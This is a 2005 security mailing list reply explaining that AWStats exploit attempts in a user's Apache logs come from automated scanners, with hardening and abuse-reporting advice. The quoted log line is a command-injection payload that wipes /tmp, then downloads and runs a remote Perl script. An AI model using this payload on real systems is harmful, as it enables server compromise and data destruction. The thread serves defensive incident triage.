Security Basics mailing list archives
Re: GET //awstats.pl? in apache logs
From: FocusHacks <focushacks () gmail com>
Date: Mon, 24 Oct 2005 08:55:19 -0500
It's simply someone or some automated scanning script trying to exploit the AWStats script on your server. It could be a script kiddie that's simply running the attack against a wide range of IP Addresses including yours. It might also be a worm of some sort that's looking for a way to propogate itself. Honestly, I wouldn't be too concerned about this as long as you're certain that you're up to date on patches and don't have too many extra things installed on your web site. It happens to all of us. If you do have a lot of things installed on your site, such as phpMyAdmin, phpNuke, Xoops, and the like, I usually recommend changing the default path that they're installed in, which makes it more difficult for automated scanning scripts and/or skript kiddies to abuse, should an exploit ever be released for that software. Also, if you can, put non-public WWW scripts and applications in a directory with HTTP Authentication. My webalizer and phpMyAdmin directories are password protected, for instance. If you continue to see attacks from the same (or similar) IP, then go to this page and type in the IP Address(es) that the attacks are coming from. It will give you ownership and contact info for the address. This is usually the attacker's ISP. http://ws.arin.net/whois When contacting them (typically via abuse () their-domain-name com), include as much detail as possible, including the log files attached (only relavent log file portions) and the time zone that the log file's date stamp is in. This will often help them determine which of their customers it is. If the IP address seems to be from overseas, especially from Asia, good luck getting any response or action. I've found the best way to solve that problem is to firewall off the subnet that the attacks came from. However, I have been known to simply firewall off an entire class A (59.x.x.x and 61.x.x.x come to mind, both are allocated to Asia Pacific NIC) Forgive the horrid colors, but this is a good page with a lot of well-known shady IP addresses and subnets: http://www.unixhub.com/block.html Cheers, --Noah On 10/21/05, Konstantine <listclient () gmail com> wrote:
My apache logs show rows after rows of following, all from various IP addresses. This started a couple of days ago. I don't have awstats. Could somebody tell me what is that? Is there anything I should be doing? thanks.K. GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/kidk1d/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1
-- http://www.FocusHacks.com - The Ford Focus Modification Site!
Current thread:
- GET //awstats.pl? in apache logs Konstantine (Oct 24)
- Re: GET //awstats.pl? in apache logs ilaiy (Oct 24)
- Re: GET //awstats.pl? in apache logs Andreas Constantinides (MegaHz) (Oct 24)
- Re: GET //awstats.pl? in apache logs FocusHacks (Oct 24)
- Re: GET //awstats.pl? in apache logs Can't dig that daddy (Oct 24)
- RE: GET //awstats.pl? in apache logs mail list (Oct 24)
- Message not available
- Fwd: GET //awstats.pl? in apache logs Tobias Hahn (Oct 25)
- RE: GET //awstats.pl? in apache logs mail list (Oct 24)
- Re: GET //awstats.pl? in apache logs S.A. Birl (Oct 24)
- Re: GET //awstats.pl? in apache logs Konstantine (Oct 25)
- <Possible follow-ups>
- Re: GET //awstats.pl? in apache logs [a] (Oct 24)